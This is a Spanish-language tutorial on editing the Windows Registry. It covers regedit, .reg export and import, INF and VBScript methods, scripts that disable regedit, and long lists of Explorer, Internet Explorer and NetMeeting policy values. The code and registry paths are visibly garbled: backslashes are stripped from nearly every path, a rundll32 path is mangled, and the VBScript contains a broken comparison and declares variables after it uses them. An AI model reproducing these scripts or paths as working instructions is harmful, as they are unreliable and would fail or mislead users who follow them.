Qué significa %Systemroot% y %Userprofile%, son variables de sistemas, las puedes ver escribiendo SET en el Intérprete de comandos, es una manera de escribir C:Windows y C.Documents and SettingsPaco, pero que valga para todos, pues podríamos haber instalado Windows en otra partición y tener otro nombre de usuario.



¿Cómo podemos modificar el contenido del Registro de Windows? Pues podemos ir a cada uno de los archivos anteriores con un Editor unicode y modificarlo, pero esto es complicado. Lo mejor es ir a una herramienta llamada Editor del Registro: Inicio/Ejecutar/regedit. Veremos todos los archivos anteriores dispuestos de una manera elegante, en forma de carpetas (NO son carpetas, se llaman claves HKEY) y fácilmente accesibles. En realidad no se ven cada archivo por separado sino que el propio Editor del Registro se encarga de presentarlos de esta particular manera.

Observamos que hay cinco claves llamadas:

HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG



Cada una de las Claves tiene subclaves.

En el Panel derecho observamos los Valores, éstos contienen Datos.

Veamos rápidamente el menú del Editor de Registro. (Puedes acceder a todos los elementos del menú mediante el Botón derecho del ratón.)

Archivo/Exportar = Coge una parte del Registro y la guarda en un archivo .reg

Archivo/Importar = Coge un archivo.reg y lo introduce en el Registro.





--------------------------------------------------------------------------------

Ejercicio :

Modificar la Página de Inicio del Internet Explorer al clicquear sobre un archivo.

Marca la clave : HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main
Ahora ve a Archivo/Exportar y guárdalo en Mis documentos con el nombre de prueba.reg

Ve al Bloc de notas y edita el archivo anterior: prueba.reg

Cambia "Start Page"="http://www.trucosxp.tk/"
Guarda el archivo y ahora doble clic sobre él. El archivo se grabará en el Registro y modificará la Página de Inicio del Internet Explorer.



--------------------------------------------------------------------------------

Edición/Nuevo para crear una nueva clave o valor. Los valores más usuales son de tipo DWORD y Alfanumérico.

También mediante Edición podemos Eliminar o Cambiar el nombre de una clave.

Edición/Buscar para buscar una clave, valor o dato. (Podemos marcar o desmarcar las casillas)
F3: Continuar buscando.

Para cambiar el Dato de un Valor, pulsar con el botón derecho del ratón sobre ese valor y eligiendo la opción Modificar.

Edición/Permisos…. El Registro sólo lo pueden modificar los Administradores del sistema pero no los usuarios "limitados".
Podemos darle permiso a algún otro usuario para que también lo pueda modificar. Entramos en la opción Permisos Agregar/Avanzadas/Buscar ahora y elegimos al usuario que podrá modificar todo o algún elemento del Registro.

Los tipos de permisos en opciones avanzadas son los siguentes :
Control total : Permite que posea todos los permisos posibles.
Consultar valor : Permite que tenga permiso de lectura.
Establecer valor : Permite que tenga permiso de escritura.
Crear subclave : Permite que pueda crear subclaves.
Enumerar subclaves : Permite que pueda listar las subclaves de una clave.
Notificar : Notificará cuando la clave sea modificada.
Eliminar : Permite que pueda eliminar claves.

Fundamentalmente el Registro se compone de dos claves:
HKEY_LOCAL_MACHINE y HKEY_USERS, en estas dos claves están todos los parámetros del registro.

Lo que ocurre es que para mayor comodidad la primera de ellas deriva en otras dos llamadas: HKEY_CURRENT_CONFIG y HKEY_CLASSES_ROOT.

Y de la segunda clave deriva HKEY_CURRENT_USER


--------------------------------------------------------------------------------

Vamos a comentar cada clave:

Clave HKEY_LOCAL_MACHINE

Esta clave contiene la configuración general del ordenador. Así como información de los programas y periféricos conectados al ordenador.
De ella proceden la HKEY_CURRENT_CONFIG y la HKEY_CLASSES_ROOT.
(Los cambios que hagamos en esta clave, afectarán a todos los usuarios)

Clave HKEY_CLASSES_ROOT

En esta clave se encuentra los archivos registrados, sus extensiones y los programas asociados.
También se encuentra los números de identificación de clases (CLSID) y los iconos de cada objeto.
Esta clave es parte de la HKEY_LOCAL_MACHINE concretamente la HKEY_LOCAL_MACHINE/Software/Classes

Clave HKEY_CURRENT_CONFIG

En esta clave está la configuración actual del sistema. También tiene la configuración de los Periféricos.

Clave HKEY_USERS

Esta clave contiene la configuración de todos los usuarios del ordenador. Según van conectándose usuarios al ordenador, aparecen claves del tipo S-1-5-21-76556 …….. aquí están las claves de los usuarios conectados, de todos ellos la clave del usuario actual se repite en HKEY_CURRENT_USER.

Clave HKEY_CURRENT_USER

En esta clave se encuentra la configuración del usuario que está actualmente usando el ordenador.
Los cambios que hagamos en esta clave afectará solo al usuario actual.
Aquí están los sonidos asociados, escritorio, papel tapiz, teclado, las aplicaciones que se pueden usar, la red, ....Se almacena la configuración del usuario que actualmente está usando el ordenador. La información aquí contenida es copiada de la clave HKEY_USERS, una clave del tipo:
S-1-5-21-76556 ……

Dentro de esta clave hay una muy importante HKCU/Software/Microsoft/Windows/CurrentVersion en donde se puede controlar distintos aspectos del sistema.


--------------------------------------------------------------------------------

Veamos algunas subclaves de las claves principales:

HKCR

Extensiones de archivos .txt, .bat,.mp3, .wav ,.bmp… * significa todos los archivos.
Tipos de archivos textfile, batfile, avifile, …..
CLSID nombre de objetos. Ejemplo, la Papelera es 645FF040-5081-101B-9F08-00AA002F954E
DefaultIcon Icono
Shell es el menú que sale con el botón derecho del ratón (Menú contextual)
Shell/Open/command Programa que abre un cierto tipo de archivo.
Open as …. Abrir como …
Sharing … Compartir …
AudioCD
Directory Configuración de directorios
Folder Configuración de carpetas.
Drive Configuración de unidades.

HKCU

AppEvents Sonidos
Console Configuración de la consola del Intérprete de comandos.
Control Panel Configuración del Panel de control. Accessibility( 1,0), Appearance, Colors, Desktop, WindowsMetrics, Keyboard, PowerCfg, ..
Enviroment Algunas variables de entorno.
Software/Microsoft/Windows/CurrentVersion es importantísima porque aquí está la configuración de muchos aspectos de Windows.

HKLM

Hardware = ACPI gestión avanzada de energía,
Description = información del microprocesador,
DeviceMap = información del .. ratón, teclado, puertos,
SAM Configuración de seguridad, está protegida.
Security Configuración de seguridad, está protegida. Se utiliza cuando estamos en un dominio.
Software Información (a veces codificada) de programas instalados, fecha, versión, licencia, colores
Classes es HKCR
System Información sobre perfiles de Hardware, controladores, unidades de disco.


--------------------------------------------------------------------------------


Notas :

Los archivos moricons.dll, pifmgr.dll, shell32.dll contienen colecciones de iconos.
Los archivos .cpl son utilidades del Panel de control. (Busca los archivos *.cpl)
Rundll32 es un programa que ejecuta algunos archivos .dll y .cpl

Ejercicios :

Inicio/Ejecutar/desk.cpl
Inicio/Ejecutar/Rundll32 desk.cpl,InstallScreenSaver %1


--------------------------------------------------------------------------------

Formas de modificar el Registro (Vamos a ver cuatros maneras, hay otra manera mediante el MSDOS en el W98):

1.- Exportando una clave. Modificándola con el Bloc de notas. Clic sobre el archivo .reg.

Modificar la Página de Inicio del Internet Explorer al clicquear sobre un archivo.

Marca la clave : HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main
Ahora ve a Archivo/Exportar y guárdalo en Mis documentos con el nombre de prueba.reg

Ve al Bloc de notas y edita el archivo anterior: prueba.reg

Cambia "Start Page"="http://www.trucosxp.tk/"
Guarda el archivo y ahora doble clic sobre él. El archivo se grabará en el Registro y modificará la Página de Inicio del Internet Explorer.

2.- Mediante un archivo INF.

Éstos archivos se ejecutan pulsando sobre ellos con el botón derecho y luego Instalar.

Con el Bloc de notas creamos éste archivo: quitareje.inf

[Version]
Signature = "$CHICAGO$"

[DefaultInstall]
AddReg=Añadir.al.Registro
DelReg=Borrar.del.Registro

[Añadir.al.Registro]
HKCU,"SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer",NoRun,0x00010001,"0"

; [Borrar.del.Registro]
; HKCU,"SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer",NoRun

; ATENCIÓN: Todo en la misma línea:; HKCU,"SoftwareMicrosoft.........Explorer",NoRun,0x00010001,"0"



Éste archivo pone o quita la opción Ejecutar en el menú de inicio. (Cerrar y Abrir sesión para ver cambios)

CLAVEPRINCIPAL, "SubclaveSubclave,Subclave", Valor, TipodeValor, Dato

El Tipo de valor (Flag) lo podemos obtener de:


http://msdn.microsoft.com/library/default.asp?url=/library/en-us/install/hh/install/inf-format_2v02.asp

Si es W98, podemos poner como TipodeValor:

0 Para valores de cadena.
1 Para valores binarios

Ir el Editor de Registro y pulsar F5 para ver los cambios efectuados.


--------------------------------------------------------------------------------

Para instalar directamente los archivos .inf desde un archivo por lotes.bat, podemos poner dentro del lotes.bat:
en XP
C:WINDOWSSystem32 undll32.exe setupapi,InstallHinfSection DefaultInstall 132 C:archivo.inf

en W98?
Run("C:WINDOWS undll.exe", "setupx.dll,InstallHinfSection DefaultInstall 132 C:archivo.inf")

---------------
[Probar también:]
ShellExecute("c:archivo.inf","","",@normal,"Install")
Y
C:> rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 C:archivo.inf

3.- Mediante vbs

Crear un archivo llamado comname.vbs con éste contenido:




Option Explicit

Set ws = WScript.CreateObject("WScript.Shell")
Dim ws, t, p1, n, cn, vbdefaultbutton
Dim itemtype

p1 ="HKLMSYSTEMCurrentControlSetControlComputerNameComputerName"

n = ws.RegRead(p1 & "ComputerName")
t = "Cambiar el Nombre del Equipo"
cn = InputBox("Nuevo Nombre", t, n)
If cn "" Then
ws.RegWrite p1 & "ComputerName", cn
End If





4.- Directamente mediante el Editor del Registro de Windows:
Inicio/Ejecutar/regedit


--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

Deshabilitar - Habilitar el Editor del Registro (regedit.exe)


Para Deshabilitar regedit.exe

Crea un archivo llamado: NOregedit.vbs (Copiar-Pegar)





Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools", 1, "REG_DWORD"
WshShell.RegWrite "HKLMSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools", 1, "REG_DWORD"





Para Habilitar regedit.exe

Crea un archivo llamado SIregedit.vbs (Copiar-Pegar)




Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")
On Error Resume Next
WshShell.RegDelete "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools"
WshShell.RegDelete "HKLMSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools"





--------------------------------------------------------------------------------

Limpiador del Registro

Cuando utilizamos instalamos y borramos aplicaciones, alguna de ellas dejan rastro, basura, enlaces rotos, claves, valores,.... en el Registro de Windows, que enlentecen el sistema.

Hay diversos programas para borrar la basura del Registro, uno de ellos es el RegCleaner (Limpiador del Registro)

Bajar RegCleaner: RegCleaner.exe (537 K)(Gratuito)

http://www.winguides.com/software/display.php/25/


Lo ponemos en español: Options / Language / Select language / Spanish.rlg

Vamos a limpiar... Herramientas / Limpieza del Registro / Limpiar todo

Seleccionamos... Seleccionar / Todo

Borramos.... Botón Borrar Seleccionado

Hecho.


--------------------------------------------------------------------------------

Otro buen programa de éste tipo de Registry Medic: http://www.iomatic.com/ éste es shareware.


--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

Los elementos del Registro de Windows se pueden modificar mediante las ventanas de configuración de Windows o mediante programas como el TWEAKUI. Sin embargo vamos a modificarlo directamente desde el Editor de Registro como ejercicio.


--------------------------------------------------------------------------------

Ejemplos:

1.- Para que en Inicio no salga "Cerrar sesión"
HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion Policies Explorer Crear en el panel derecho una DWORD llamada StartMenuLogOff y ponerlo en value 1

2.- Podemos evitar que se utilice el Intérprete de comandos: HKCU/Software/Policies/Microsoft/Windows/System. Panel derecho crear un DWORD llamado DisableCMD y ponerlo en 1 (No permitir), 2 o 0 (Sí permitir).
[Debes crear las claves Windows y System]

3.- Para que los usuarios tengan que pulsar Ctrl+Alt+Supr para entrar en el Sistema :
(Se utiliza cuando hay varios usuarios configurados)
HKLM/Software/Microsoft/Windows NT/Current Version/Winnlogon En el Panel derecho crear una nueva DWORD llamada DisableCAD con valor 0


4.- Las Propiedades de pantalla sale mediante: Botón derecho sobre el escritorio/Propiedades. Para deshabilitar las fichas de Propiedades de pantalla :
HKCU/Software/Microsoft/Windows/Current Version/Policies/System ir a Panel derecho y crear o cambiar los valores DWORD de :

NoDispBackgroundPage poner a 1 para que no salga "Escritorio"
NoDispAppearancePage """"""""""""""""""""" "Apariencia"
NoDispSettingsPage """"""""""""""""""""""" "Configuración"
NoDispScrSavPage """""""""""""""""""""""" "Protector de pantalla"

5.- Ocultar el reloj.
HKCU/Software/Microsoft/Windows/Current Version/Policies/Explorer en el Panel derecho crear el valor DWORD llamado HideClock y ponerle valor 1

O bien: Panel de control/Apariencia y temas/Barra de tareas y menú de inicio.

6.- Mediante Herramientas/Opciones de carpeta podemos configurar diversos aspectos de las carpetas y de los archivos. Para que no aparezca la opción "Opciones de carpeta..." en Herramientas de la barra de menús (arriba) :
HKCU/Software/Microsoft/Windows/Current Version/Policies/Explorer en el Panel derecho crear el valor DWORD llamado NoFolderOptions y ponerle valor 1

7.- Ocultar Apagar equipo :
HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer Crear o modificar un DWORD llamado NoClose y poner el Value en 1. (Reiniciar) Para volver a poner el Botón de apagado poner un Value 0

8.- Para que un programa se ejecute en el inicio. Ir a HKCU/Software/Microsoft/Windows/CurrentVersion/Run en el Panel derecho crea un nuevo valor Alfanumérico llamado Calculadora y ponle de valor calc.exe


Ve también a
HKLM/Software/Microsoft/Windows/CurrentVersion/Run en el Panel derecho crea un nuevo valor Alfanumérico llamado Interprete y ponle de valor cmd

9.- Para que no se pueda inhabilitar Agregar o quitar programas, vamos a HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Uninstall y en el Panel derecho crear un valor DWORD llamado NoAddRemovePrograms, poner su valor a 1

10.- Para que no salga la mano en las carpetas compartidas :
HKCR/Network/SharingHandler en el Panel derecho quitar msshrui.dll (o ntshrui.dll) o en el valor de (Predeterminado)

11.- Queremos que cuando entremos en el Intérprete de comandos, nos salga un listado y la frase "Bienvenido al Intérprete de comandos"
HKCU/Software/Microsoft/CommandProcessor en el Panel derecho crear un nuevo valor alfanumérico llamado AutoRun con estos comandos :
DIR && ECHO "Bienvenidos al Interprete de comandos"


--------------------------------------------------------------------------------

El texto anterior lo puedes bajar en formato .doc : registrodewindows.doc (48 K)


--------------------------------------------------------------------------------

Veamos distintas claves del Registro:

Muchos "trucos" del Registro de Windows se pueden realizar mediante la "Directiva de grupo" (gpedit.msc), mediante programas como el TweakUI (550 K) o simplemente mediante las ventanas de Windows. Sin embargo vamos a ver qué claves y valores cambian cuando efectuamos algunos cambios de configuración.

Desde aquí puedes bajar el archivo tweakuiayuda.pdf (560 K). Es un documento de ayuda del TweakUI, está en pdf, para ver este tipo de archivo necesitas un programa llamado Adobe Acrobat Reader, lo puedes bajar gratuitamente de Internet. El Acrobat Reader es muy conocido, a veces lo regalan en el CDROM que viene con las revistas de informática.

Si tienes Windows XP Professional, puedes ir a la Directiva de grupo, Inicio/Ejecutar/gpedit.msc
Luego ves a:
Configuración de usuarios/Plantillas administrativas
desde aquí podrás perfilar la configuración de tu ordenador.

También puedes ver más configuración mediante las claves del Registro en: 500 Trucos

Para entrar en el editor del Registro de Windows vamos a Inicio/Ejecutar/regedit.


En el Panel izquierdo vemos unos iconos en forma de subcarpetas que representan a las Claves.
En el Panel derecho observamos Valores (SearchHidden) y sus Datos (000001).
Los Valores pueden ser de varios tipos, los más corrientes son DWORD.





Para crear una Clave vas al Panel izquierdo y pulsa el Botón derecho/Nuevo/Clave
Para crear un Valor vas al Panel derecho y pulsa el Botón derecho/Nuevo/Valor DWORD,
le pones un nombre (SearchHidden), haces un doble clic sobre él y pones un Dato.

Cuando pones un Dato en 1 estas habilitando ese Valor, cuando pones un Dato en 0 estas deshabilitando ese Valor. Si borras el valor y reinicias, también lo deshabilitas.

SearchHidden 1 Buscar los ocultos
SearchHidden 0 No Buscar los ocultos




Ve a la clave:

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPolicies

Mira si contiene éstas subclaves: Explorer, Network, Ratings, System, ActiveDesktop y WinOldApp.
En caso que no la tengan, créalas: Marca Policies/botón derecho/Nuevo/Clave/ nombre de la clave
Para crear un valor te situas en su correspondiente clave, te vas al Panel derecho/botón derecho/Nuevo/Valor DWORD y escribe su nombre, luego le pondrás como Dato 0 o 1.
Una vez creadas las subclaves anteriores vamos a crear los siguientes Valores en ellas:







Subclave Explorer:

ClearRecentDocsOnExit = Borra Documentos recientes cuando sales.
DisableRegistryTools = Anula el Editor del Registro (regedit)
Atención: Si Anulas el Editor del Registro, luego no podrás modificar el Registro. Lo tendrás que hacer con un archivo VBScript o un .REG.
NoActiveDesktop = Deshabilitar Active Desktop
NoAddPrinter = No añadir nuevas impresoras.
NoClose = Desactivar el elemento "Apagar el sistema"
NoChangeStarMenu = Evitar cambios en el menú de Inicio
NoDeletePrinter = No quitar la impresora actual
NoDesktop = Deshabilitar todos los elementos del Escritorio y anular botón derecho en el Escritorio
NoDevMgrUpdate = No permitir/Permitir el gestor de actualización
NoDrives [hex] = Ocultar/Poner discos en Mi PC y Explorador de Windows.
Atención: Hacerlo mejor con el TweakUI (My Computer)
NoFavoritesMenu = Quitar/Poner Favoritos del menú de Inicio
NoFolderOptions = Quitar la ficha "Opciones de carpeta" del menú configuración
NoFind = Quitar/Poner "Buscar" del menú de Inicio.
NoFileMenu = Quitar "Archivos" del intérprete de comandos (command)
NoInternetIcon = Ocultar/Poner el icono Internet Explorer del Escritorio
NoLoggOff = Deshabilitar cierre de sesión el el menú de Inicio
NoNetHood = Ocultar el icono Entorno de Red (en Windows 98)
NoRecentDocsHistory = No mantener el historial de los documentos abiertos recientemente.
NoRun = Quitar/Poner "Ejecutar" del menú de Inicio.
NoSaveSettings = No guardar configuración al salir del sistema
NoSetFolders = Deshabilitar los cambios en la configuración del Panel de control e Impresoras
NoSetTaskbar = Deshabilitar los cambios en la configuración del menú Inicio y barra tareas
NoSMMyDocs = Quitar Mis Documentos de menú de Inicio (Win98/ME)
NoSMMyPictures = Quitar Mis imagenes del menú de Inicio (Win98/ME)
NoTrayContextMenu = Deshabilitar el menú contextual en la barra de tareas (Bandeja-reloj)

NoWindowsUpdate = No permitir actualización de Windows 98 y ME

Subclave System:

NoAdminPage = Ocultar "Administración remota"
NoConfigPage = Ocultar "Perfiles de hardware"
NoControlPanel [hex] = Quitar Panel de control
NoDevMgrPage = Quitar "Administrador de dispositivos "
NoDispAppearancePage = Ocultar "Página de aspecto"
NoDispBackgroundPage = Ocultar "Fondo"
NoDispCPL = Desactivar Panel de control de monitor
NoDispScrSavPage = Ocultar "Protector de pantalla"
NoDispSettingsPage = Ocultar "Configuración"
NoFileSysPage = Ocultar "Sistema de archivos" de Rendimiento/Propiedades del Sistema
NoPwdPage = Ocultar "Cambiar la contraseña"
NoProfilePage = Ocultar "Perfiles de usuarios"
NoSecCPL = Desactivar el programa Contraseñas del Panel de control
NoVirtMemPage = Permitir o no botón de "Memoria virtual "
DisableRegistryTools = Desactivar herramientas de edición del Registro

Subclave Network:

DisablePwdCaching = Evitar cache de claves
HideSharePwds [hex] = Evitar claves ocultas
NoEntireNetwork = Evitar Ver toda la red
NoNetSetup = Deshabilitar el icono Red en el Panel de control
NoNetSetupIDPage = Ocultar la ficha "Identificación"
NoNetSetupSecurityPage = Ocultar la pestaña"Control de acceso"
NoFileSharing = Quitar la opción "Compartir..." archivos
MinPwdLen = Colocar la mínima cantidad de caracteres para la Clave (0 - 99)
NoPrintSharing = Quitar la opción "Compartir Impresora"
NoWorkgroupContents = Sin contenidos de grupo de trabajo en Entorno de red

Subclave ActiveDesktop (Win98
* FeArX + IE4/IE5/IE6):

NoAddingComponents = Permitir o no Active Desktop
NoChangingWallpaper = Permitir o no cambiar fondo de pantalla.
NoCloseDragDropBands = Permitir o no cerrar la Barra de herramientas
NoClosingComponents = Permitir o no cerrar los componentes de Active Desktop
NoComponents = Permitir o no todos los elementos del Escritorio
NoDeletingComponents = Permitir o no borrar componentes de Active Desktop
NoEditingComponents = Permitir o no editar componentes de Active Desktop
NoHTMLWallPaper = Permitir o no presentar fondo en HTML de Desktop HTML
NoMovingBands = Permitir o no mover barra de herramientas

Subclave WinOldApp:

Disabled = Desactivar el símbolo MSDOS
NoRealMode = No permitir reiniciar el equipo en MSDOS (Win95/98)

--------------------------------------------------------------------------------



También podemos encontrar las subclaves: Explorer, Network, System y ActiveDesktop en:

HKEY_USERS.DefaultSoftwareMicrosoftWindowsCurrentVersionPolicies

y:

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPolicies

Lo que esté en ".Default" se le aplican a todos los usuarios.
Si hay más de un usuario, aquí aparecerá una clave por cada uno de ellos.




Explorer


CDRAutoRun [hex] = Permite o no Autoarranque de CD-R(W)/DVD-R(W)

ChannelNotify = Permitir o no notificación de cambio de disco (Win98
* FeArX + IE4/IE5/IE6)
ClassicShell [hex] = Habilita el intérprete de comandos clásico(Win98
* FeArX + IE4/IE5/IE6)

ClearRecentDocsOnExit = Borrar "Documentos recientes" al salir.
EditLevel = Poner nivle de seguridad 0, 1, 2, 3 o 4
Atención: Puedes bloquear el ordenador si pones nivel 4
EnforceShellExtensionSecurity = Seguridad en las claves shellextension
ForceCopyACLWithFile = Permitir o no copiar archivo en NTFS (WinNT4/2000/XP + IE4/IE5/IE6 )
IgnoreLinkInfo = Permitir o no presentar los enlaces.
LinkResolve = Permitir o no presentar los enlacese
MyDocsOnNet = Permitir o no Mis Documentos en Internet
NoActiveDesktop = Permitir o no Active Desktop
NoActiveDesktopChanges = Elimina la ficha Web del cuadro de diálogos Propiedades de Pantalla
NoAddPrinter = Permitir o no añadir nuevas impresoras.
NoChangeStartMenu = Permitir o no hacer cambios en el Menu de inicio
NoCommonGroups = Permitir o no Agrupar programas en el Menú de inicio. (WinNT4/2000/XP)
NoClose = Permitir o no cerrar el IE
NoCustomizeWebView = Permitir o no personalizar Vista Web
NoDeletePrinter = Permitir o no quitar la impresora.
NoDeskTop = Permitir o no objetos en el Escritorio y botón derecho sobre el Escritorio
NoDevMgrUpdate = Permitir o no gestor de actualización de Windows (Win98/ME/2000/XP)
NoDrives [hex] = Poner o quitar disco en Mi PC/Explorer/IE
Atención: Realizarlo mejor con el TweakUI (My Computer)
NoDriveTypeAutoRun [hex] = Permitir o no Autoarranque de CD/DVD

NoEditMenu = Permitir o no Editar el Menú de inicio
NoFavoritesMenu = Quitar o no "Favoritos" de Menú de inicio
NoFileMenu = Permitir o no "Archivos" en Explorador de Windows y IE
NoFileUrl = Permitir o no acceder a archivos locales mediante URL
NoFind = Quitar o Poner "Buscar" en el Menú de inicio
NoFolderOptions = Mostrar o no "Opciones de carpeta"
NoForgetSoftwareUpdate = Permitir o no "Actualizar Programas de Windows" (Win98/ME/2000/XP)
NoHelp = Mostrar o no "Ayuda" en el Menú de inicios
NoInternetIcon = Mostrar o no el icono Internet en el Escritorio
NoLogOff = Mostrar o no "Cerrar sesión" en el Menú de inicio.
NoMSAppLogo = Mostrar o no el logo de Microsofts (Win98/ME/2000/XP)
NoNetConnectDisconnect = Permitir o no Desconectar de rede
NoNetHood = Ver o no Entorno de Red
NoRecentDocsHistory = Permitir o no añadir nuevos documentos a "Documentos" de Incio(Win98/ME)
NoRecentDocsMenu = Mostar o no Documentos recientes en la configuración del Menú de inicio
NoResolveSearch = Quitar o no "Buscar" en Internet (Win98
* FeArX + IE4/IE5/IE6)
NoResolveTrack = enable/disable Internet Address Tracking (Win98
* FeArX + IE4/IE5/IE6)
NoRun = Quitar o no "Ejecutar" del menú de inicio
NoSaveSettings [hex] = No salvar los cambios de configuración al salir
NoSetActiveDesktop = Elimina "Active Directory" del submenú Configuración del Menú Inicio.
NoSetFolders = Permitir o no configurar Carpetas
NoSetTaskbar = Permitir o no configurar la barra de tareas
NoSettingsWizards = Permitir o no el Asistente de configuración(Win98
* FeArX + IE4/IE5/IE6)
NoStartBanner [hex] = Permitir o no el Logo del IE
NoStartMenuSubFolders = Mostrar o no subcarpetas en el Menú de inicio
NoTrayContextMenu = Mostrar o no Menú contextual en la Bandeja de Windows (zona reloj)
NoViewContextMenu = Mostrar o no Menú contextual
NoWebMenu = Mostrar o no Menú Web (Win98/IE 4.0)
NoWindowsUpdate = Permitir o no Actualizar Windows(Win98/ME/2000/XP)
NoWinKeys = Permitir o no la tecla Win
RestrictRun = Permitir o no Ejecutar programas
Atención: Si activas este valor tal vez no puedas ejecutar ningún programa.
Algunos de estos valores también se encuentran en:

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer

Ejemplo:

NoControlPanel [hex] = Permitir o no Panel de control

La mayoría de la configuración de "CURRENT_USER", sobre todo aquellas que afectan al sistema, cambian automáticamente al modificar su valor similar en "LOCAL_MACHINE".

Las restricciones de Internet Explorer 4.0x/5.xx/6.xx se encuentran bajo estas claves:

HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerRestrictions

y:

HKEY_USERS.DefaultSoftwarePoliciesMicrosoftInternet ExplorerRestrictions

Si hay más de un usuario configurado, cada uno tendrá su clave particular.


NoAdressBar = desactiva la Barra de direcciones.
NoBrowserContextMenu = Permitir o no menú contextual en HTML
NoBrowserClose = Permitir o no Cerrar/Salir y Alt+F4 en "Archivo"
NoBrowserSaveAs = Permitir o no Guardar/Guardar como... en "Archivo"
NoBrowserOptions = Permitir o no Herramientas/Opciones de Internet
NoFavorites = Permitir o no "Favoritos" y Alt+A
NoFileOpen = Permitir o no "Abrir" de "Archivo", Ctrl+A y Ctrl+L
NoFileNew = Permitir o no "Nuevo" en "Archivo" y Ctsl+U
NoFileUrl = Permitir o no acceso a archivos locales mediente su Dirección (URL)
NoFindFiles = Permitir o no "Buscar" y F3
NoLinksBar = desactiva la barra de enlaces.
NoSelectDownloadDir = Permitir o no "Guardar como.." al bajar un archivo
NoTheaterMode = Pemitir o no Pantalla completa (modo kiosko) y F11
NoToolBar = desactiva la barra de herramientas
NoToolbarOptions = desactiva añadir, eliminar y mover la barra de herramientas
Las restricciones de las Propiedades de Internet para MS Internet Explorer 4.0x/5.xx/6.xx (además del Panel de control) se encuentran en esta clave del Registro:

HKEY_USERS.DefaultSoftwarePoliciesMicrosoftInternet ExplorerControl Panel

En caso de que haya más usuarios, cada uno tendrá su clave con su configuración particular.


Accessibility = Permitir o no configurar "Accesibilidad"
Advanced = Permitir o no configurar "Avanzado"
AdvancedTab = Poner o quitar la ficha "Avanzado"
Autoconfig = Permitir o no configurar "Autoconfiguración"
Cache = Permitir o no confugurar la caché
CalendarContact = Permitir o no configurar Contactos
Check_If_Default = Permitir o no chequear si el IE es el navegador por defecto
Connection Settings = Permitir o no Configurar la conexión
Certificates = Permitir o no configurar "Certificados"
CertifPers = Permitir o no configurar Certificados Personales
CertifSite = Permitir o no configurar Certificados Públicos
Colors = Permitir o no configurar Colores
Connection Wizard = Permitir o no el Asistente de conexión
ConnectionsTab = Permitir o no ficha de Conexiones
Connwiz Admin Lock = Permitir o no Asistente de conexión administrativa
ContentTab = Permitir o no la ficha de Contenidos
Fonts = Permitir o no la ficha de Fuentes
FormSuggest = Permitir o no configurar sugerencia de los Formularios
FormSuggest Passwords = Permitir o no configurar clave
GeneralTab = Permitir o no la ficha General
History = Permitir o no la ficha Historial
HomePage = Permtir o no configurar la página de inicio
Languages = Permitir o no configurar Idiomas
Links = Permitir o no configurar Enlaces
Messaging = Permitir o no configurar MS Mesenger
Profiles = Permitir o no configurar Perfiles
ProgramsTab = Permitir o no la ficha Programas
Proxy = Permitir o no configurar Proxy
Ratings = permitir o no configurar la clave
ResetWebSettings = Permitir o no configurar Borrar Web
SecAddSites = Permitir o no configurar Añadir sitios seguros
SecChangeSettings = Permitir o no hacer cambios de seguridad
SecurityTab = Permitir o no la ficha de seguridad
Settings = Permitir o no cajas de Configuración
Wallet = Permitir o no la configuración de MS Wallet (MS IE 5.xx)
Las políticas de restrccionde de MS Net Meeting se encuentran en esta clave:

HKEY_USERS.DefaultSoftwarePoliciesMicrosoftConferencing

En caso de que haya más usuarios, cada uno tendrá su clave con su configuración particular


CallSecurity = Permitir o no Seguridad
IntranetWebDirURL = Permitir o no directorio Web en Intranet
MaximumBandwidth = Permitir o no máximo ancho de banda
NoAddingDirectoryServers = Permitir o no añadir servidores
NoAdvancedCalling = Permitir o no "Avanzado"
NoAllowControl = Permitir o no Control
NoAppSharing = Permitir o no Compartir
NoAudio = Permitir o no Audio
NoAudioPage = Permitir o no configurar Audio
NoChangeDirectSound = Permitir o no cambiar DirectSound
NoChat = Permitir o no Chatear
NoDirectoryServices = Permitir o no Servicios de directorios
NoFullDuplex = Permitir o no Duplex
NoGeneralPage = Permitir o no Generall
NoNewWhiteBoard = Permitir o no Nueva Pizarra
NoOldWhiteBoard = Permitir o no Vieja Pizarra
NoReceivingVideo = Permitir o no recibir vídeo
NoSecurityPage = Permitir o no Seguridad
NoSendingFiles = Permitir o no Enviar archivos
NoSendingVideo = Permitir o no Enviar Vídeo
NoSharing = Permitir o no Compartir
NoSharingDesktop = Permitir o no Compartir Escritorio
NoSharingDosWindows = Permitir o no compartir DOS + Windows
NoSharingExplorer = Permitir o no Complartir Explorador
NoTrueColorSharing = Permitir o no Compartir control de Color
NoVideoPage = Permitir o no compartir control de vídeo
NoWebDirectory = Permitir o no Directorio Web
Use AutoConfig = Permitir o no autoconfiguración


HKEY_USERS.DefaultSoftwareMicrosoftWindowsCurrentVersionWebcheck

En caso de que haya más usuarios, cada uno tendrá su clave con su configuración particular


NoChannelLogging = Permitir o no conectar a los canales
NoScheduledUpdates = Permitir o no actualizar

**********************************************************************








El Registro de Windows - Uso de RegEdit

--------------------------------------------------------------------------------

